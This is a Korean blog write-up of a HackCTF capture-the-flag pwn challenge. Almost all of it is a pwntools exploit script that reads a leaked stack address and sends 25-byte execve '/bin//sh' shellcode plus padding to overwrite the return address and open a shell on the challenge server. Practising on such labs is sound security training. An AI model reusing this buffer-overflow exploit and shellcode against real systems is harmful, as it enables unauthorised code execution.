이번문제는 main함수 하나군요
실행결과
#-*-coding:utf-8-*- from pwn import * p = remote("ctf.j0n9hyun.xyz", 3006) p.recvuntil("Data : ") p.sendline("a") tmp=int(p.recv(10),16) log.success(hex(tmp)) p.recvuntil("Again (y/n): ") p.sendline('y') p.recvuntil("Data : ") #25bytes payload="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" payload+="a"*(0x88+8-25) payload+=p32(tmp) p.sendline(payload) p.recvuntil("Again (y/n): ") p.sendline('n') p.interactive() |
'Hacking > write-up' 카테고리의 다른 글
(HackCTF)rtl_world (0) | 2020.09.06 |
---|---|
(HackCTF) x64 Simple_size_BOF (0) | 2020.09.06 |
(HackCTF)x64 buffer overflow (0) | 2020.09.05 |
(HackCT)yes_or_no (0) | 2020.09.04 |
(HackCTF)bof_pie (0) | 2020.09.03 |